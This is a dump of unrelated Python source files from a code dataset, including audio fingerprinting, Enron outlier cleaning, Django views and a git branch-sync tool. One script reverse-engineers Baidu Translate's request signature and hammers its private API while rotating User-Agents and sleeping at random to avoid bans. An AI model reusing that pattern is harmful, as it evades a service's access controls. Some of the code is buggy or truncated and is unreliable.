)\n fingerprint_args.add_argument(\n \"--min-time-delta\", type=float, default=0, metavar=\"\",\n help=\"Target zone min time offset difference for hashes\"\n )\n\n fingerprint_args.add_argument(\n \"-a\", \"--min-amplitude\", type=float, default=10, metavar=\"\",\n help=\"Spectogram peak minimum amplitude in dB\"\n )\n fingerprint_args.add_argument(\n \"--spectrogram-backend\", type=str, choices=(\"scipy\", \"matplotlib\"),\n default=\"scipy\",\n help=\"Library to use for computing spectrogram\"\n )\n fingerprint_args.add_argument(\n \"--win-overlap-ratio\", type=float, default=0.5, metavar=\"\",\n help=\"Window overlap as a fraction of window size, in the range [0, 1)\"\n )\n fingerprint_args.add_argument(\n \"--win-size\", type=int, default=4096, metavar=\"\",\n help=\"Number of samples per FFT window\"\n )\n return core_parser\n\n\ndef get_parser():\n \"\"\"\n Get arg parser for the audio module CLI (i.e., yamfp command).\n \"\"\"\n core_parser = get_core_parser()\n parser = argparse.ArgumentParser(\n parents=[core_parser],\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Visualize an audio file fingerprint by plotting its \"\n \"spectrogram, spectrogram peaks, and/or fingerprint (peak pairs).\"\n )\n\n parser.add_argument(\n \"filepath\", type=pathlib.Path, metavar=\"\",\n help=\"Path to audio file\"\n )\n parser.add_argument(\n \"-c\", \"--channels\", nargs=\"+\", type=int, metavar=\"\",\n help=\"Plot only the specified audio channels (beginning at 0)\"\n )\n parser.add_argument(\n \"-p\", \"--no-peaks\", action=\"store_true\",\n help=\"Do not plot spectrogram peaks\"\n )\n parser.add_argument(\n \"-F\", \"--plot-fingerprints\", action=\"store_true\",\n help=\"Plot fingerprint constellations between peak pairs instead of \"\n \"plotting spectrogram\"\n )\n parser.add_argument(\n \"-t\", \"--title\", type=str, metavar=\"\",\n help=\"Set plot title; defaults to filename if omitted\"\n )\n parser.add_argument(\n \"--start\", type=float, metavar=\"<seconds>\",\n help=\"Audio segment end time in seconds (beginning of file if omitted)\"\n )\n parser.add_argument(\n \"--end\", type=float, metavar=\"<seconds>\",\n help=\"Audio segment end time in seconds (end of file if omitted)\"\n )\n\n # Update defaults of some existing values to make them more reasonable for\n # plotting and visualization.\n parser.set_defaults(fanout=3, min_time_delta=1, max_time_delta=10)\n return parser\n","sub_path":"youtube_audio_matcher/audio/_argparsers.py","file_name":"_argparsers.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"172320920","text":"#!/usr/bin/python\n\nimport sys\nsys.path.append(\"../tools/\")\n\nimport matplotlib.pyplot\nimport numpy as np\nimport pprint\nfrom feature_format import featureFormat, targetFeatureSplit\n\ndef show_boxplot(data, name):\n import seaborn as sns\n sns.violinplot(data, color=\"green\", orient=\"v\", title=name)\n sns.plt.show()\n\ndef show_features(data_dict, feat1, feat2):\n data = featureFormat(data_dict, [feat1, feat2])\n data_poi = featureFormat(data_dict, [\"poi\"])\n for point in data:\n matplotlib.pyplot.scatter(point[0], point[1])\n\n matplotlib.pyplot.xlabel(feat1)\n matplotlib.pyplot.ylabel(feat2)\n matplotlib.pyplot.show()\n # print \"highest\", feat1, dict_find(feat1, data[:, 0].max())\n # print \"highest\", feat2, dict_find(feat2, data[:, 1].max())\n\n# def dict_find(key, value):\n# for name, data in data_dict.iteritems():\n# if (data[key] == value):\n# return name\n\ndef get_higher(data, percentil):\n return np.argsort(data)[::-1][0:int(len(data) * percentil)]\n\ndef get_lower(data, percentil):\n return np.argsort(data)[0:int(len(data) * percentil)]\n\ndef clean_outilers(data_dict, features_list, percentile=10):\n data_dict.pop(\"TOTAL\", 0)\n data_dict.pop(\"LOCKHART EUGENE E\", 0)\n data_array = featureFormat( data_dict, features_list, remove_all_zeroes=False )\n to_remove = []\n\n for i in range(1, len(features_list)):\n for h in get_higher(data_array[:, i], percentile/100):\n if data_array[h, i] > np.percentile(data_array[:, i], 75 and data_array[h, 0] == 0.0): # is not poi\n to_remove.append(data_dict.keys()[h])\n for l in get_lower(data_array[:, i], percentile / 100):\n if data_array[h, i] < np.percentile(data_array[:, i], 25 and data_array[h, 0] == 0.0): # is not poi\n to_remove.append(data_dict.keys()[h])\n\n for r in to_remove:\n data_dict.pop(r, 0)\n\n return data_dict","sub_path":"final_project/remove_outliers.py","file_name":"remove_outliers.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"554283119","text":"\"\"\"\nView\nGet's data from controller\n\"\"\"\n\nfrom mvc import controller\n\n\nclass Error:\n @staticmethod\n def no_file():\n print(\"\\nThere is no Data to show right now.\")\n @staticmethod\n def no_such_course_type():\n print(\"\\nThere is no such course type.\")\n @staticmethod\n def no_teachers():\n print(\"\\nThere's no teacher in our database right now.\")\n @staticmethod\n def no_such_key():\n print(\"\\nThere's no record in the course database.\")\n\n\nclass ICourse:\n \"\"\"Interface for Course\n Get data from controller\n \"\"\"\n\n def Course_Interface(self, data):\n \"\"\"type and course name\"\"\"\n print(\n \"\\nCourse Type : Course names\", data,\n \"\\nInput any key to return to the main menu.\")\n input()\n ICourseFactory.menu(self)\n\n def i_course_Enter(self):\n print(\"1. Input > type of course: 'local' or 'offsite' :\")\n print(\"2. Input > Course name:\")\n print(\"3. Input > Course code:\")\n\n def i_course_topics_Enter(self):\n print(\"1. Input > Local course topics. Separate with comma (,) :\", end=\"\")\n print(\"2. Input > Course code :\")\n\n\nclass ITeacher:\n \"\"\"Interface for Teacher Information\n \"\"\"\n\n def Teacher_Interface(self, data):\n \"\"\"name and course code\"\"\"\n print(\n \"\\nTeacher Name : Course Code\", data,\n \"\\nInput any key to return to the main menu.\")\n input()\n ICourseFactory.menu(self)\n\n def i_teacher_Enter(self):\n print(\"1. Input > Teacher's name:\")\n print(\"2. Input > Teacher's course code:\")\n\n\nclass ILocalCourse(ICourse):\n \"\"\"Interface for Local Courses\"\"\"\n\n def Local_Course_Interface(self, data):\n \"\"\"course name and topics\"\"\"\n print(\n \"\\nCourse Name : Topics\", data,\n \"\\nInput any key to return to the main menu.\"\n )\n input()\n ICourseFactory.menu(self)\n\n\nclass IOffsiteCourse(ICourse):\n \"\"\"Interface for Offsite Courses\"\"\"\n\n def Offsite_Course_Interface(self, data):\n \"\"\"course name and topics\"\"\"\n print(\n \"\\nTopic Name : Course Code\", data,\n \"\\nInput any key to return to the main menu.\"\n )\n input()\n ICourseFactory.menu(self)\n\n\nclass ICourseFactory(ITeacher, ILocalCourse, IOffsiteCourse):\n \"\"\"Interface for Course Factory\n for creating courses, inputting teachers, courses...\"\"\"\n\n def __init__(self):\n self.control = controller.CourseFactory()\n super().__init__()\n\n def run(self):\n print(\"\\nGreeting. Welcome To The Worlds Most Awesome Course Corporation Software.\"\n \"\\nOur job is to help you to create courses.\"\n \"\\nHere are the current Courses in our database.\")\n self.control.course_info()\n ICourseFactory.menu(self)\n\n def menu(self):\n print(\"Input Commands: \"\n \"\\n ** 1 ** to view current course information\"\n \"\\n ** 2 ** to view teachers information\"\n \"\\n ** 3 ** to view Local courses\"\n \"\\n ** 4 ** to view Offsite courses \"\n \"\\n ** 9 ** to create new course.\"\n \"\\n ** 0 ** to exit.\")\n self.control.choose()\n","sub_path":"Semester_2_Labs/Lab_3_General_Assignments/E_G_Task_2/mvc/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"577021293","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom anvil import colorizer\nfrom anvil import log as logging\nfrom anvil import shell as sh\nfrom anvil import utils\n\nfrom anvil.components import base_install as binstall\nfrom anvil.components import base_runtime as bruntime\n\nfrom anvil.components.configurators import cinder as cconf\n\nLOG = logging.getLogger(__name__)\n\n# Sync db command\nSYNC_DB_CMD = [sh.joinpths('$BIN_DIR', 'cinder-manage'),\n # Available commands:\n 'db', 'sync']\n\n\nclass CinderInstaller(binstall.PythonInstallComponent):\n def __init__(self, *args, **kargs):\n binstall.PythonInstallComponent.__init__(self, *args, **kargs)\n self.configurator = cconf.CinderConfigurator(self)\n\n def post_install(self):\n binstall.PythonInstallComponent.post_install(self)\n if self.get_bool_option('db-sync'):\n self.configurator.setup_db()\n self._sync_db()\n\n def _sync_db(self):\n LOG.info(\"Syncing cinder to database: %s\", colorizer.quote(self.configurator.DB_NAME))\n cmds = [{'cmd': SYNC_DB_CMD}]\n utils.execute_template(*cmds, cwd=self.bin_dir, params=self.config_params(None))\n\n def config_params(self, config_fn):\n mp = binstall.PythonInstallComponent.config_params(self, config_fn)\n mp['BIN_DIR'] = self.bin_dir\n return mp\n\n\nclass CinderRuntime(bruntime.PythonRuntime):\n def __init__(self, *args, **kargs):\n bruntime.PythonRuntime.__init__(self, *args, **kargs)\n self.config_path = sh.joinpths(self.get_option('cfg_dir'), cconf.API_CONF)\n\n @property\n def applications(self):\n apps = []\n for (name, _values) in self.subsystems.items():\n name = \"cinder-%s\" % (name.lower())\n path = sh.joinpths(self.bin_dir, name)\n if sh.is_executable(path):\n apps.append(bruntime.Program(name, path, argv=self._fetch_argv(name)))\n return apps\n\n def app_params(self, program):\n params = bruntime.PythonRuntime.app_params(self, program)\n params['CFG_FILE'] = self.config_path\n return params\n\n def _fetch_argv(self, name):\n return [\n '--config-file', '$CFG_FILE',\n ]\n","sub_path":"anvil/components/cinder.py","file_name":"cinder.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"292401886","text":"import os\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom django.http import HttpResponse\n\n\nfrom . import database\nfrom .models import PageView\n\n# Create your views here.\n\n\ndef index(request):\n hostname = os.getenv(\"HOSTNAME\", \"unknown\")\n PageView.objects.create(hostname=hostname)\n\n return render(\n request,\n \"welcome/index.html\",\n {\n \"hostname\": hostname,\n \"database\": database.info(),\n \"count\": PageView.objects.count(),\n },\n )\n\n\ndef health(request):\n return HttpResponse(PageView.objects.count())\n\n\ndef header_default(request):\n response = render(request, \"welcome/header.html\")\n return response\n\n\ndef header_overwritten(request):\n response = render(request, \"welcome/header.html\")\n response[\"Cache-Control\"] = \"public\"\n response[\"X-My-Other-Header\"] = \"custom\"\n return response\n\n\ndef headers(request):\n headers = \"\\n\".join(\n [\"{key}={value}\".format(key=key, value=value) for key, value in request.META.items()]\n )\n return HttpResponse(content=headers, content_type=\"text/plain\")\n","sub_path":"welcome/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"357397110","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# 广医五院 志明 2019-05-23 10:32\n# 当前计算机登录名称 :andy\n# 项目名称 :andy\n# 编译器 :PyCharm\n__author____ = '志明'\n__time__ = '2019-05-23 10:32'\n\nimport re\nimport requests as rq\nimport execjs\nimport os\nimport csv\n\na = ''' \n function a(r) {\n if (Array.isArray(r)) {\n for (var o = 0, t = Array(r.length); o < r.length; o++)\n t[o] = r[o];\n return t\n }\n return Array.from(r)\n }\n function n(r, o) {\n for (var t = 0; t < o.length - 2; t += 3) {\n var a = o.charAt(t + 2);\n a = a >= \"a\" ? a.charCodeAt(0) - 87 : Number(a),\n a = \"+\" === o.charAt(t + 1) ? r >>> a : r << a,\n r = \"+\" === o.charAt(t) ? r + a & 4294967295 : r ^ a\n }\n return r\n }\n var i = null;\n function e(r) {\n var t = r.length;\n t > 30 && (r = \"\" + r.substr(0, 10) + r.substr(Math.floor(t / 2) - 5, 10) + r.substr(-10, 10))\n\n var u = void 0, l = \"\" + String.fromCharCode(103) + String.fromCharCode(116) + String.fromCharCode(107);\n \n u = null !== i ? i : (i = '320305.131321201' || \"\") || \"\";\n for (var d = u.split(\".\"), m = Number(d[0]) || 0, s = Number(d[1]) || 0, S = [], c = 0, v = 0; v < r.length; v++) {\n var A = r.charCodeAt(v);\n 128 > A ? S[c++] = A : (2048 > A ? S[c++] = A >> 6 | 192 : (55296 === (64512 & A) && v + 1 < r.length && 56320 === (64512 & r.charCodeAt(v + 1)) ? (A = 65536 + ((1023 & A) << 10) + (1023 & r.charCodeAt(++v)),\n S[c++] = A >> 18 | 240,\n S[c++] = A >> 12 & 63 | 128) : S[c++] = A >> 12 | 224,\n S[c++] = A >> 6 & 63 | 128),\n S[c++] = 63 & A | 128)\n }\n for (var p = m, F = \"\" + String.fromCharCode(43) + String.fromCharCode(45) + String.fromCharCode(97) + (\"\" + String.fromCharCode(94) + String.fromCharCode(43) + String.fromCharCode(54)), D = \"\" + String.fromCharCode(43) + String.fromCharCode(45) + String.fromCharCode(51) + (\"\" + String.fromCharCode(94) + String.fromCharCode(43) + String.fromCharCode(98)) + (\"\" + String.fromCharCode(43) + String.fromCharCode(45) + String.fromCharCode(102)), b = 0; b < S.length; b++)\n p += S[b],\n p = n(p, F);\n return p = n(p, D),\n p ^= s,\n 0 > p && (p = (2147483647 & p) + 2147483648),\n p %= 1e6,\n p.toString() + \".\" + (p ^ m)\n }\n '''\n\n\ndef main():\n import time\n import random\n from SuTranslate.UserAgentInfos import UserAgentInfos\n url = \"https://fanyi.baidu.com/\"\n # response = rq.get(url, headers=header)\n headers = {'User-Agent': UserAgentInfos.GetUserAgent()}\n # 代理只针对访问的协议有关,访问http会随机选取http中的ip,若无,则使用真实ip地址\n proxies = {'https': None,\n 'http': None, }\n # 使用同一Session进行调用接口,可以使请求头自动带上Cookies\n sess = rq.Session()\n response = sess.get(url=url, headers=headers, timeout=5, proxies=proxies)\n # 请求两次避免出现cookies过期,请求两次出现过期的概率极低,加上headers,否则请求头部不带上Cookies\n response = sess.get(url=url, headers=headers, timeout=5, proxies=proxies)\n # print(response.raw._connection.sock.getpeername()[0])\n # 使用正则表达式提取token\n token = re.findall(r\"token: '(.*?)',\", response.text)[0]\n b = execjs.compile(a)\n Text = '测试'\n sign = b.call('e', Text)\n data = {\n 'from': 'zh',\n 'to': 'en',\n 'query': Text,\n 'simple_means_flag': 3,\n 'sign': sign,\n 'token': token\n }\n url2 = 'https://fanyi.baidu.com/v2transapi'\n time.sleep(random.random())\n result = sess.post(url=url2, data=data, timeout=5, proxies=proxies)\n if result.status_code != 200:\n print(result)\n print(\"访问失败!\")\n exit(1)\n print(result, result.status_code, result.json())\n # 使用随机睡眠减少被封\n import time\n import random\n for i in range(10000):\n result = sess.post(url=url2, data=data, proxies=proxies)\n print(i)\n if result.status_code != 200:\n print(result)\n break\n # print(result.json()['trans_result']['data'][0])\n print(result, result.status_code, result.json())\n t = random.random() * 2\n print(t)\n time.sleep(t)\n\n\ndef write_file_csv(file_name=\"\", msg=\"\"):\n if len(file_name.strip()) == 0 or not isinstance(file_name, (str,)):\n return {'error': 1, 'msg': '文件名称为非字符串或者为空'}\n if not isinstance(msg, (str, list, tuple, dict, set,)):\n return {'error': 2, 'msg': '要写入的内容不符合要求'}\n elif (isinstance(msg, (str,)) and len(msg.strip()) == 0) or (isinstance(msg, (list, set, tuple)) and len(msg) == 0):\n return {'error': 3, 'msg': '要写入的内容为空'}\n # 将指定的文本内容写到file_name.csv文件中\n file_name = file_name.replace(file_name[-4:], '-1.csv')\n try:\n with open(file_name, 'a', newline=\"\") as f:\n w_csv = csv.writer(f)\n if isinstance(msg, (str,)):\n w_csv.writerow((msg,))\n else:\n w_csv.writerow((msg[0], msg[1]))\n f.close()\n return {'error': 0, 'msg': '文件写入成功!'}\n except IndexError:\n return {'error': 4, 'msg': '数组越界,请多传入几个数据!'}\n except PermissionError:\n return {'error': 5, 'msg': '文件写入权限被拒绝!'}\n\n\ndef read_file_csv(file_name=\"\"):\n \"\"\"\n 从csv文件读取数据,返回列表\n :param file_name: 文件名\n :return:\n \"\"\"\n if len(file_name.strip()) == 0 or not isinstance(file_name, (str,)):\n return {'error': 1, 'msg': '文件名称为非字符串或者为空'}\n data = list()\n with open(file_name, 'r') as f:\n r_csv = csv.reader(f)\n for row in r_csv:\n data.append(row)\n f.close()\n return {'error': 1, 'msg': '文件名称为非字符串或者为空', 'result': data}\n\n\ndef is_contain_chinese(check_str):\n \"\"\"\n 判断字符串中是否包含中文\n :param check_str: {str} 需要检测的字符串\n :return: {bool} 包含返回True, 不包含返回False\n \"\"\"\n for ch in check_str:\n if u'\\u4e00' <= ch <= u'\\u9fff':\n return 1\n return 0\n\n\nif __name__ == '__main__':\n file = f'c:/Users/andy/Desktop/zh_CN.locale.csv'\n file2 = f'c:/Users/andy/Desktop/zh_CN.locale-1.csv'\n r1 = set(read_file_csv(file)['result'])\n r2 = set(read_file_csv(file2)['result'])\n # 得到需要翻译的集合\n # r\n print(len(r))\n","sub_path":"TensorflowTest/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"3115666","text":"#!/usr/bin/python3\n\"\"\"Handles the current session\"\"\"\n\nimport os\nimport sys\nfrom http import cookies\nimport shelve\nimport time\nimport hashlib\n\n__SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\n__SCRIPT_DIR = os.path.normpath(os.path.join(__SCRIPT_DIR, '..'))\nif not __SCRIPT_DIR in sys.path:\n sys.path.append(__SCRIPT_DIR)\n\nfrom utils import config\n\nsys.path.append(config.SESSION_FILES_ROOT_PATH)\n\nSESSION = None\nclass Session(object):\n \n def __init__(self, expires=None, cookie_path=None):\n string_cookie = os.environ.get('HTTP_COOKIE', '')\n self.cookie = cookies.SimpleCookie()\n self.cookie.load(string_cookie)\n \n #if S_ID in self.cookie:\n # sid = self.cookie[S_ID].value\n #global Data\n if self.cookie.get('sid'):\n sid = self.cookie['sid'].value\n # Clear session cookie from other cookies\n self.cookie.clear()\n\n else:\n self.cookie.clear()\n sid = hashlib.sha256(repr(time.time()).encode()).hexdigest()\n\n self.cookie['sid'] = sid\n\n if cookie_path:\n self.cookie['sid']['path'] = cookie_path\n \n session_dir = config.SESSION_FILES_FOLDER_PATH\n \n '''\n if not os.path.exists(session_dir):\n try:\n os.mkdir(session_dir, 0o2770)\n # If the apache user can't create it do it manualy\n except OSError as e:\n errmsg = \"\"\"\n %s when trying to create the session directory.\n Create it as '%s'\n \"\"\" % (e.strerror, os.path.abspath(session_dir))\n raise OSError \n ''' \n '''\n self.data = shelve.open (\n '%s/sess_%s' % (session_dir, sid), \n writeback=True\n )\n nsid = sid# + '.db'\n os.chmod('%s/sess_%s' % (session_dir, nsid), 0o660)\n '''\n # Initializes the expires data\n #if not self.data.get('cookie'):\n # self.data['cookie'] = {'expires':''}\n\n self.set_expires(expires)\n #Data = self.data\n\n def set_expires(self, expires=None):\n if expires == '':\n self.cookie['sid']['expires'] = ''\n elif isinstance(expires, int):\n self.cookie['sid']['expires'] = expires\n","sub_path":"utils/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"652097871","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom typing import cast, Any, Dict, List, Optional, Tuple, Union\nimport os\n\n\ndef _check_output(items: List[str], encoding: str = \"utf-8\") -> str:\n from subprocess import check_output\n return check_output(items).decode(encoding)\n\n\ndef fuzzy_list_to_dict(items: List[Tuple[str, str]]) -> Dict[str, List[str]]:\n \"\"\"\n Converts list to dict preserving elements with duplicate keys\n \"\"\"\n rc: Dict[str, List[str]] = defaultdict(lambda: [])\n for (key, val) in items:\n rc[key].append(val)\n return dict(rc)\n\n\nclass GitCommit:\n commit_hash: str\n title: str\n body: str\n author: str\n author_date: datetime\n commit_date: Optional[datetime]\n\n def __init__(self,\n commit_hash: str,\n author: str,\n author_date: datetime,\n title: str,\n body: str,\n commit_date: Optional[datetime] = None) -> None:\n self.commit_hash = commit_hash\n self.author = author\n self.author_date = author_date\n self.commit_date = commit_date\n self.title = title\n self.body = body\n\n def __repr__(self) -> str:\n return f\"{self.title} ({self.commit_hash})\"\n\n def __contains__(self, item: Any) -> bool:\n return item in self.body or item in self.title\n\n\ndef parse_fuller_format(lines: Union[str, List[str]]) -> GitCommit:\n \"\"\"\n Expect commit message generated using `--format=fuller --date=unix` format, i.e.:\n commit <sha1>\n Author: <author>\n AuthorDate: <author date>\n Commit: <committer>\n CommitDate: <committer date>\n\n <title line>\n\n <full commit message>\n\n \"\"\"\n if isinstance(lines, str):\n lines = lines.split(\"\\n\")\n # TODO: Handle merge commits correctly\n if len(lines) > 1 and lines[1].startswith(\"Merge:\"):\n del lines[1]\n assert len(lines) > 7\n assert lines[0].startswith(\"commit\")\n assert lines[1].startswith(\"Author: \")\n assert lines[2].startswith(\"AuthorDate: \")\n assert lines[3].startswith(\"Commit: \")\n assert lines[4].startswith(\"CommitDate: \")\n assert len(lines[5]) == 0\n return GitCommit(commit_hash=lines[0].split()[1].strip(),\n author=lines[1].split(\":\", 1)[1].strip(),\n author_date=datetime.fromtimestamp(int(lines[2].split(\":\", 1)[1].strip())),\n commit_date=datetime.fromtimestamp(int(lines[4].split(\":\", 1)[1].strip())),\n title=lines[6].strip(),\n body=\"\\n\".join(lines[7:]),\n )\n\n\nclass GitRepo:\n def __init__(self, path: str, remote: str = \"origin\") -> None:\n self.repo_dir = path\n self.remote = remote\n\n def _run_git(self, *args: Any) -> str:\n return _check_output([\"git\", \"-C\", self.repo_dir] + list(args))\n\n def revlist(self, revision_range: str) -> List[str]:\n rc = self._run_git(\"rev-list\", revision_range, \"--\", \".\").strip()\n return rc.split(\"\\n\") if len(rc) > 0 else []\n\n def current_branch(self) -> str:\n return self._run_git(\"symbolic-ref\", \"--short\", \"HEAD\").strip()\n\n def checkout(self, branch: str) -> None:\n self._run_git('checkout', branch)\n\n def show_ref(self, name: str) -> str:\n refs = self._run_git('show-ref', '-s', name).strip().split('\\n')\n if not all(refs[i] == refs[0] for i in range(1, len(refs))):\n raise RuntimeError(f\"referce {name} is ambigous\")\n return refs[0]\n\n def rev_parse(self, name: str) -> str:\n return self._run_git('rev-parse', '--verify', name).strip()\n\n def get_merge_base(self, from_ref: str, to_ref: str) -> str:\n return self._run_git('merge-base', from_ref, to_ref).strip()\n\n def patch_id(self, ref: Union[str, List[str]]) -> List[Tuple[str, str]]:\n is_list = isinstance(ref, list)\n if is_list:\n if len(ref) == 0:\n return []\n ref = \" \".join(ref)\n rc = _check_output(['sh', '-c', f'git -C {self.repo_dir} show {ref}|git patch-id --stable']).strip()\n return [cast(Tuple[str, str], x.split(\" \", 1)) for x in rc.split(\"\\n\")]\n\n def get_commit(self, ref: str) -> GitCommit:\n return parse_fuller_format(self._run_git('show', '--format=fuller', '--date=unix', '--shortstat', ref))\n\n def cherry_pick(self, ref: str) -> None:\n self._run_git('cherry-pick', '-x', ref)\n\n def compute_branch_diffs(self, from_branch: str, to_branch: str) -> Tuple[List[str], List[str]]:\n \"\"\"\n Returns list of commmits that are missing in each other branch since their merge base\n Might be slow if merge base is between two branches is pretty far off\n \"\"\"\n from_ref = self.rev_parse(from_branch)\n to_ref = self.rev_parse(to_branch)\n merge_base = self.get_merge_base(from_ref, to_ref)\n from_commits = self.revlist(f'{merge_base}..{from_ref}')\n to_commits = self.revlist(f'{merge_base}..{to_ref}')\n from_ids = fuzzy_list_to_dict(self.patch_id(from_commits))\n to_ids = fuzzy_list_to_dict(self.patch_id(to_commits))\n for patch_id in set(from_ids).intersection(set(to_ids)):\n from_values = from_ids[patch_id]\n to_values = to_ids[patch_id]\n if len(from_values) != len(to_values):\n # Eliminate duplicate commits+reverts from the list\n while len(from_values) > 0 and len(to_values) > 0:\n frc = self.get_commit(from_values.pop())\n toc = self.get_commit(to_values.pop())\n if frc.title != toc.title or frc.author_date != toc.author_date:\n raise RuntimeError(f\"Unexpected differences between {frc} and {toc}\")\n from_commits.remove(frc.commit_hash)\n to_commits.remove(toc.commit_hash)\n continue\n for commit in from_values:\n from_commits.remove(commit)\n for commit in to_values:\n to_commits.remove(commit)\n return (from_commits, to_commits)\n\n def cherry_pick_commits(self, from_branch: str, to_branch: str) -> None:\n orig_branch = self.current_branch()\n self.checkout(to_branch)\n from_commits, to_commits = self.compute_branch_diffs(from_branch, to_branch)\n if len(from_commits) == 0:\n print(\"Nothing to do\")\n self.checkout(orig_branch)\n return\n for commit in reversed(from_commits):\n self.cherry_pick(commit)\n self.checkout(orig_branch)\n\n def push(self, branch: str) -> None:\n self._run_git(\"push\", self.remote, branch)\n\n\nif __name__ == '__main__':\n repo_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))\n default_branch = 'master'\n sync_branch = 'fbsync'\n repo = GitRepo(repo_dir)\n repo.cherry_pick_commits(sync_branch, default_branch)\n repo.push(default_branch)\n","sub_path":".github/scripts/syncbranches.py","file_name":"syncbranches.py","file_ext":"py","file_size_in_byte":7055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"451990498","text":"import numpy as np\r\nimport pickle\r\nfrom loading_input_v3 import *\r\nfrom sklearn.neighbors import KDTree\r\n\r\ndef get_queries_dict(filename):\r\n\twith open(filename, 'rb') as handle:\r\n\t\tqueries = pickle.load(handle)\r\n\t\tprint(\"feature Loaded.\")\r\n\t\treturn queries\r\n\r\nDATABASE_PCAI_VECTORS_FILENAME = \"database_pcai_feat_00441147.pickle\"\r\nQUERY_PCAI_VECTORS_FILENAME = \"query_pcai_feat_00441147.pickle\"\r\n\r\nDATABASE_PC_VECTORS_FILENAME = \"database_pc_feat_00441147.pickle\"\r\nQUERY_PC_VECTORS_FILENAME = \"query_pc_feat_00441147.pickle\"\r\n\r\nDATABASE_IMG_VECTORS_FILENAME = \"database_img_feat_00441147.pickle\"\r\nQUERY_IMG_VECTORS_FILENAME = \"query_img_feat_00441147.pickle\"\r\n#result output\r\noutput_file = \"result_img_trans_mono_left_00240080.txt\"\r\n#load feature\r\nDATABASE_PCAI_VECTORS = get_queries_dict(DATABASE_PCAI_VECTORS_FILENAME)\r\nQUERY_PCAI_VECTORS = get_queries_dict(QUERY_PCAI_VECTORS_FILENAME)\r\n\r\nDATABASE_PC_VECTORS = get_queries_dict(DATABASE_PC_VECTORS_FILENAME)\r\nQUERY_PC_VECTORS = get_queries_dict(QUERY_PC_VECTORS_FILENAME)\r\n\r\nDATABASE_IMG_VECTORS = get_queries_dict(DATABASE_IMG_VECTORS_FILENAME)\r\nQUERY_IMG_VECTORS = get_queries_dict(QUERY_IMG_VECTORS_FILENAME)\r\n\r\n#load label\r\nQUERY_FILE= 'generate_queries_v3/stereo_centre_trans_RobotCar_ground_selected_oxford_evaluation_query.pickle'\r\nQUERY_SETS= get_sets_dict(QUERY_FILE)\r\n\r\nfor m in range(len(QUERY_SETS)):\r\n\tprint(len(QUERY_PCAI_VECTORS[m]))\r\n\tprint(len(QUERY_SETS[m]))\r\n\tif len(QUERY_SETS[m]) != len(QUERY_PCAI_VECTORS[m]):\r\n\t\tprint(\"not equal\")\r\n\r\n\r\ndef get_recall(m, n, DATABASE_VECTORS, QUERY_VECTORS):\r\n\tdatabase_output= DATABASE_VECTORS[m]\r\n\tqueries_output= QUERY_VECTORS[n]\r\n\r\n\tprint(len(queries_output))\r\n\tdatabase_nbrs = KDTree(database_output)\r\n\r\n\tnum_neighbors=25\r\n\trecall=[0]*num_neighbors\r\n\r\n\ttop1_similarity_score=[]\r\n\tone_percent_retrieved=0\r\n\tthreshold=max(int(round(len(database_output)/100.0)),1)\r\n\r\n\tnum_evaluated=0\r\n\tone_percent_recall_data = [0]*len(queries_output)\r\n\tfor i in range(len(queries_output)):\r\n\t\ttrue_neighbors= QUERY_SETS[n][i][m]\r\n\t\tif(len(true_neighbors)==0):\r\n\t\t\tcontinue\r\n\t\tnum_evaluated+=1\r\n\t\tdistances, indices = database_nbrs.query(np.array([queries_output[i]]),k=num_neighbors)\r\n\t\tfor j in range(len(indices[0])):\r\n\t\t\tif indices[0][j] in true_neighbors:\r\n\t\t\t\tif(j==0):\r\n\t\t\t\t\tsimilarity= np.dot(queries_output[i],database_output[indices[0][j]])\r\n\t\t\t\t\ttop1_similarity_score.append(similarity)\r\n\t\t\t\trecall[j]+=1\r\n\t\t\t\tbreak\r\n\t\t\t\t\r\n\t\tif len(list(set(indices[0][0:threshold]).intersection(set(true_neighbors))))>0:\r\n\t\t\tone_percent_retrieved+=1\r\n\t\t\tone_percent_recall_data[i]=1\r\n\t\t\t\r\n\t\t\t\r\n\tif num_evaluated == 0:\r\n\t\treturn None,None,None,None\r\n\tone_percent_recall=(one_percent_retrieved/float(num_evaluated))*100\r\n\trecall=(np.cumsum(recall)/float(num_evaluated))*100\r\n\tprint(recall)\r\n\t#print(np.mean(top1_similarity_score))\r\n\tprint(one_percent_recall)\r\n\treturn recall, top1_similarity_score, one_percent_recall,one_percent_recall_data\r\n\t\r\ndef main():\r\n\tfor i in range(len(DATABASE_PCAI_VECTORS)):\r\n\t\tprint(\"database feature 